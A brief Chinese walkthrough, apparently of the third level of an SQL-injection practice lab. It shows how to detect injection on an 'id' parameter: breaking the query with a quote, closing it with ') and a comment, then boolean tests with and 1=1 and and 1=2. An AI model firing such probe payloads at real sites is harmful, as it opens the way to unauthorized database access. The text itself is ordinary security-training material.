打开第三关页面,老规矩给id赋值可查询出对应的数据,存在可变参数id,注入可能存在。
1、判断注入点及注入类型
id=1’ 加入单引号,页面报错
根据报错的提示信息,除了单引号之外,还有括号,两者都要闭合。
猜测后台数据库查询语句:
select name from users where id=(‘1’);
构造闭合语句:
select name from users where id=(‘1’) %23 ‘);
id=1’)%23 页面正常,说明闭合成功
id=1’) and 1=1%23 页面正常
id=1’) and 1=2%23 页面异常或出错